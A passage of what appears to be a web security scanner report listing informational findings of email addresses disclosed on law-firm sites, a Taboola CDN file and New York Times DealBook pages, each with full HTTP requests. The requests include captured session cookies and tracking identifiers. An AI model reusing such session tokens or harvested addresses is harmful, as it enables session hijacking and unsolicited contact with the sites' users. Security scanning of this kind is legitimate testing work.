Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 05 Jan 2011 23:22:43 GMT
ETag: "504b9e-c133-49921a97796c0"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 1d
Content-Type: text/javascript
Vary: Accept-Encoding
Cache-Control: max-age=12258
Date: Thu, 12 May 2011 11:37:58 GMT
Connection: close
Content-Length: 49459

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=
...[SNIP]...

22.3. https://ams-legal.net/support/Login.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/Login.asp

Issue detail

The following email address was disclosed in the response:

Request

POST /support/Login.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK; ASPSESSIONIDQSCDBTRB=HJGHIDNBKFGLLIOHFCIEAMGP
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

newPassword=1&userid=&password=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 2975
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:45 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...
<a href="mailto:support@ams-legal.com">support@ams-legal.com</a>
...[SNIP]...

22.4. http://axley.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://axley.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: axley.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Axley+Brynelson&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:01 GMT
Set-Cookie: JSESSIONID=9F000B72936C899EC0768471D81E1100; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 22030


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="generator" content="IMS Neptune CMS v1.0" />
<meta http-equiv="content-type" content="text
...[SNIP]...
s="imagerotator" src="/images/banner_1.JPG" width="956" height="150" alt="Axley Brynelson, LLP: Madison Wisconsin Law Firm: 2 E Mifflin St Ste 200: Madison Wisconsin 53703: 608.257.5661: 800.368.5661: law@axley.com"/>
...[SNIP]...
<td class="footer">
2 East Mifflin Street, Suite 200 | Madison, WI 53703 | 608.257.5661 | law@axley.com


</td>
...[SNIP]...

22.5. http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.en.4-6-15-45512.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /libtrc/bloomberg/rbox.en.4-6-15-45512.json

Issue detail

The following email address was disclosed in the response:

Request

GET /libtrc/bloomberg/rbox.en.4-6-15-45512.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 May 2011 09:02:58 GMT
ETag: "16b8a8c-284-4a310749b9480"
Accept-Ranges: bytes
Content-Length: 644
Content-Type: text/plain; charset=UTF-8
Content-Language: en, en
Cache-Control: private, max-age=31536000
Age: 8994
Expires: Fri, 11 May 2012 09:07:47 GMT
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...
<info@taboola.com>
...[SNIP]...

22.6. http://dealbook.nytimes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 83628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.7. http://dealbook.nytimes.com/2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=gi367p67ehp7835r; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200208493:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.8.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:2|s*2554b=0:1; nyt-m=ECB414D3480282E2168C79BA31B0FBB4&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.14.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 60222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.8. http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=gi367p67ehp7835r; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:2|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:2|s*2554b=0:1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200224858:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.10.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; nyt-m=3B3EA29AB7EF33C8FFC839DD45F6685A&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 58761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.9. http://dealbook.nytimes.com/2011/05/03/onex-sells-husky-international-for-2-1-billion/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/03/onex-sells-husky-international-for-2-1-billion/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/03/onex-sells-husky-international-for-2-1-billion/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:2|s*2554b=0:1; nyt-m=A3E775540473FF3264459DEBEF9BAA82&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200243892:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.16.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 61671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.10. http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/03/private-equity-titans-finds-common-ground/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/03/private-equity-titans-finds-common-ground/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:2|s*2554b=0:1; nyt-m=A3E775540473FF3264459DEBEF9BAA82&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200243892:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.16.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 63434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.11. http://dealbook.nytimes.com/2011/05/06/how-well-did-warner-musics-investors-do/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/06/how-well-did-warner-musics-investors-do/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/06/how-well-did-warner-musics-investors-do/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
X-Moz: prefetch
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=930466E95F2396695730936FACC2FDD6&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.19.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199699919:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.10.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f3=0:1|s*192f7=0:2|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 60505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.12. http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/06/palantir-valued-at-2-5-billion-or-more/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/06/palantir-valued-at-2-5-billion-or-more/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=13F58691AD21ECE4F6EA06AF2C1F2664&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.17.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199667235:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.6.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f3=0:1|s*192f7=0:1|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 59715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.13. http://dealbook.nytimes.com/2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=13F58691AD21ECE4F6EA06AF2C1F2664&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.17.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199667235:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.6.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; 